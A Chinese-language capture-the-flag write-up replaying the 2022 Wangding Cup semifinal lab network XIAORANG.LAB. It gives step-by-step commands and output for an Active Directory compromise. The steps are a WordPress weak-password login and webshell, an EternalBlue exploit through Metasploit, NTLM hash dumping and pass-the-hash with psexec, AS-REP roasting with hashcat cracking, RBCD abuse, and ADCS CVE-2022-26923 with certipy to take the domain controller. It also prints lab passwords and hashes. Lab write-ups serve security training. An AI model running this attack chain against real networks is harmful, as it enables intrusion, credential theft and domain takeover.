网鼎杯2022半决赛复现

首先先用fscan扫一下内容

D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan.exe -h 39.99.229.232
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-15 20:44:35] [INFO] 暴力破解线程数: 1
[2025-04-15 20:44:35] [INFO] 开始信息扫描
[2025-04-15 20:44:35] [INFO] 最终有效主机数量: 1
[2025-04-15 20:44:35] [INFO] 开始主机扫描
[2025-04-15 20:44:35] [INFO] 有效端口数量: 233
[2025-04-15 20:44:35] [SUCCESS] 端口开放 39.99.229.232:22
[2025-04-15 20:44:35] [SUCCESS] 端口开放 39.99.229.232:80
[2025-04-15 20:44:35] [SUCCESS] 服务识别 39.99.229.232:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 20:44:40] [SUCCESS] 服务识别 39.99.229.232:80 => [http]
[2025-04-15 20:44:45] [INFO] 存活端口数量: 2
[2025-04-15 20:44:45] [INFO] 开始漏洞扫描
[2025-04-15 20:44:45] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-15 20:44:45] [SUCCESS] 网站标题 http://39.99.229.232      状态码:200 长度:39988  标题:XIAORANG.LAB
[2025-04-15 20:45:02] [SUCCESS] 扫描已完成: 3/3

没有什么内容，dir扫一下内容

[20:45:31] Starting: 
[20:45:36] 403 -  278B  - /.ht_wsr.txt
[20:45:36] 403 -  278B  - /.htaccess.save
[20:45:36] 403 -  278B  - /.htaccessBAK
[20:45:36] 403 -  278B  - /.htaccess.orig
[20:45:36] 403 -  278B  - /.html
[20:45:36] 403 -  278B  - /.htaccess_extra
[20:45:36] 403 -  278B  - /.htm
[20:45:36] 403 -  278B  - /.htaccess.bak1
[20:45:36] 403 -  278B  - /.htaccessOLD2
[20:45:36] 403 -  278B  - /.htaccessOLD
[20:45:36] 403 -  278B  - /.htaccess.sample
[20:45:36] 403 -  278B  - /.htaccess_orig
[20:45:36] 403 -  278B  - /.htaccess_sc
[20:45:36] 403 -  278B  - /.htpasswd_test
[20:45:36] 403 -  278B  - /.htpasswds
[20:45:36] 403 -  278B  - /.httr-oauth
[20:45:37] 403 -  278B  - /.php
[20:45:59] 301 -    0B  - /index.php  ->  http://39.99.229.232/
[20:46:00] 404 -   35KB - /index.php/login/
[20:46:01] 200 -    7KB - /license.txt
[20:46:08] 200 -    3KB - /readme.html
[20:46:09] 403 -  278B  - /server-status
[20:46:09] 403 -  278B  - /server-status/
[20:46:18] 301 -  317B  - /wp-admin  ->  http://39.99.229.232/wp-admin/
[20:46:18] 200 -  513B  - /wp-admin/install.php
[20:46:18] 409 -    3KB - /wp-admin/setup-config.php
[20:46:18] 400 -    1B  - /wp-admin/admin-ajax.php
[20:46:18] 302 -    0B  - /wp-admin/  ->  http://39.99.229.232/wp-login.php?redirect_to=http%3A%2F%2F39.99.229.232%2Fwp-admin%2F&reauth=1
[20:46:18] 200 -    0B  - /wp-config.php
[20:46:18] 200 -    0B  - /wp-content/
[20:46:18] 301 -  319B  - /wp-content  ->  http://39.99.229.232/wp-content/
[20:46:18] 200 -  477B  - /wp-content/uploads/
[20:46:18] 200 -  416B  - /wp-content/upgrade/
[20:46:18] 200 -   84B  - /wp-content/plugins/akismet/akismet.php
[20:46:18] 500 -    0B  - /wp-content/plugins/hello.php
[20:46:18] 200 -    0B  - /wp-includes/rss-functions.php
[20:46:18] 301 -  320B  - /wp-includes  ->  http://39.99.229.232/wp-includes/
[20:46:18] 200 -    2KB - /wp-login.php
[20:46:18] 200 -    0B  - /wp-cron.php
[20:46:18] 200 -    5KB - /wp-includes/
[20:46:18] 302 -    0B  - /wp-signup.php  ->  http://39.99.229.232/wp-login.php?action=register
[20:46:18] 405 -   42B  - /xmlrpc.php

很明显是可以看出是wordpress

flag1

先简单的手测了一下是弱密码，fuzz开爆也是可以的

admin::123456登录，然后就是在editor里面写马

用蚁剑连接木马

http://39.99.159.217//wp-content/themes/twentytwentyone/header.php

先上传fsan扫描一下

[2025-04-15 21:02:45] [SUCCESS] 目标 172.22.15.35    存活 (ICMP)
[2025-04-15 21:02:45] [SUCCESS] 目标 172.22.15.26    存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.13    存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.18    存活 (ICMP)
[2025-04-15 21:02:46] [SUCCESS] 目标 172.22.15.24    存活 (ICMP)
[2025-04-15 21:02:51] [INFO] 存活主机数量: 5
[2025-04-15 21:02:51] [INFO] 有效端口数量: 233
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.26:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.26:22
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:80
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:88
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:135
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:139
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:389
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.18:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.35:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.13:445
[2025-04-15 21:02:52] [SUCCESS] 端口开放 172.22.15.24:445
[2025-04-15 21:02:52] [SUCCESS] 服务识别 172.22.15.26:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.26:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:88 => 
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:139 =>  Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:80 => [http]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:139 =>  Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.35:139 =>  Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:139 =>  Banner:[.]
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.18:445 => 
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.35:445 => 
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.13:445 => 
[2025-04-15 21:02:57] [SUCCESS] 服务识别 172.22.15.24:445 => 
[2025-04-15 21:02:58] [SUCCESS] 端口开放 172.22.15.24:3306
[2025-04-15 21:03:02] [SUCCESS] 服务识别 172.22.15.24:3306 => [mysql] 版本:5.7.26 产品:MySQL Banner:[J.5.7.26.b.H.32...v 2A` 5\@r mysql_native_password]
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.24:135 => 
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.13:135 => 
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.35:135 => 
[2025-04-15 21:03:57] [SUCCESS] 服务识别 172.22.15.18:135 => 
[2025-04-15 21:03:57] [INFO] 存活端口数量: 19
[2025-04-15 21:03:57] [INFO] 开始漏洞扫描
[2025-04-15 21:03:57] [INFO] 加载的插件: findnet, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.18
主机名: XR-CA
发现的网络接口:
   IPv4地址:
      └─ 172.22.15.18
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.13
主机名: XR-DC01
发现的网络接口:
   IPv4地址:
      └─ 172.22.15.13
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.24
主机名: XR-WIN08
发现的网络接口:
   IPv4地址:
      └─ 172.22.15.24
[2025-04-15 21:03:57] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.15.35
主机名: XR-0687
发现的网络接口:
   IPv4地址:
      └─ 172.22.15.35
[2025-04-15 21:03:57] [INFO] 系统信息 172.22.15.13 [Windows Server 2016 Standard 14393]
[2025-04-15 21:03:57] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.24       状态码:302 长度:0      标题:无标题 重定向地址: http://172.22.15.24/www
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.18       状态码:200 长度:703    标题:IIS Windows Server
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.35    XIAORANG\XR-0687              
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-04-15 21:03:57] [SUCCESS] NetBios 172.22.15.13    DC:XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393
[2025-04-15 21:03:57] [SUCCESS] 网站标题 http://172.22.15.26       状态码:200 长度:39962  标题:XIAORANG.LAB
[2025-04-15 21:03:58] [SUCCESS] 目标: http://172.22.15.18:80
  漏洞类型: poc-yaml-active-directory-certsrv-detect
  漏洞名称: 
  详细信息:
	author:AgeloVito
	links:https://www.cnblogs.com/EasonJim/p/6859345.html
[2025-04-15 21:03:58] [SUCCESS] 网站标题 http://172.22.15.24/www/sys/index.php 状态码:200 长度:135    标题:无标题
[2025-04-15 21:04:22] [SUCCESS] 扫描已完成: 35/35

整理一下信息内容

172.22.15.26 本机已通
172.22.15.13 XR-DC01
172.22.15.18  XR-CA
172.22.15.24 XR-WIN08 MS17-010
172.22.15.35 XR-0687

[2025-04-15 21:03:57] [SUCCESS] 发现漏洞 172.22.15.24 [Windows Server 2008 R2 Enterprise 7601 Service Pack 1] MS17-010

需要通个隧道(卡了比较长的时间)，这里用老版的frp直接通吧

flag2

打一手永恒之蓝

proxychains4 msfconsole
search MS17-010 blue
use 0
或者直接
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.15.24
run

meterpreter > hashdump
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

这里msf使用比较麻烦应该是因为不是pro导致的问题，直接使用psexec就行，实操过程中psexec的644行需要微调

proxychains4 python3 psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk

flag3

走浏览器代理访问一下网页，也还是弱密码admin:123456

把数据导出出来

导出模板，之后对域用户名进行整理一下

lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab

看了一下是AS-ERP Roasting

proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/ 

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] User lihongxia@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] User wangyulan@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Dynamic chain  ...  27.25.151.99:6000  ...  172.22.15.13:88  ...  OK
[-] User chenjianhua@xiaorang.lab doesn't have UF_DONT_REQUIRE_PREAUTH set

可以整理出两个信息，两个TGT

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398

hashcat爆破一下

hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:40fc9781df5b246f5b3cd4e8b6110d79$910cc853cbcc73e71332fa64924a9a5901f5af16726c2b1fab1984bcf6f7214fd9ba4fa2cfe23e11bc4951f5996839ad080d0405ee1e6d903a90b5548616659c86969a99da96a7b4f1a617e9c85257a8836fbc0e83a6771c51172af7e395b5adcec1d15be4aab915a37fa1f160c6b1e973a11de041cd223753b8f4630ffad44c961562fcfcc65e35ae108425a3668eb48498feb61ac62edf82e10f4df3e9ce0b7e606d8d001fb4c3cdd66701aa577eb6b2f09ef691af8181c9ca16d5d4c1ec3a286c79ee28a845b1640fd52428511d8247eb9da96b03ae287405eb7d2508c8cc357463bb1eb70fb8714e3807' /usr/share/wordlists/rockyou.txt

 hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:32d6ed87b8e874e386a028e86f3a3384$cc7e7580cfa37c6aac86218fc4d7a07632872b25e008b94c859702f99fb79852b4590a9cefa7aefb93065fd9f3f9b0ffee6fc41a1cbd4bde02e97d3d4fc0a8f806a8959a1f13763e964c0ec19a33f3c47e7656411db163fb3a7c5ffab6e291cbd05c6403335c84370005da10ac29ca5038dbef19f3884c3017978fabe2b83ddf36438b306c71ff1908a58efc6bd827538c32521ade17adae3ad3e114cfe726368e8854576e010cc493899d426e1e842a72db5f7608350674874c3b7990802c9abb5055e785635b6c41ea946f43b0de3724d4b977ac28aee8502e7c6a80e3e9b9ed28a68db218cf81835f7398' /usr/share/wordlists/rockyou.txt

可以跑出这两组数据

跑一下bloodhound

proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

然后导入到bloodhound看一下内容发现lixiuying对XR-0687具有GenericWrite权限，能打RBCD

proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass 'orange@admin'

proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'

proxychains4 impacket-getST xiaorang.lab/'HACK$':'orange@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13

flag4

接下来打ADCS，这里考察的是CVE-2022-26923

申请证书模版

proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine

PassTheCert/Python at main · AlmondOffSec/PassTheCert后续需要用到这个脚本

利用上面生成的 pfx 证书配置域控的 RBCD 给上面创建的HACK$

certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key

proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'

导入票据

proxychains4 impacket-getST xiaorang.lab/HACK\$:orange@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
└─# export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache

psexec无密码登录

proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk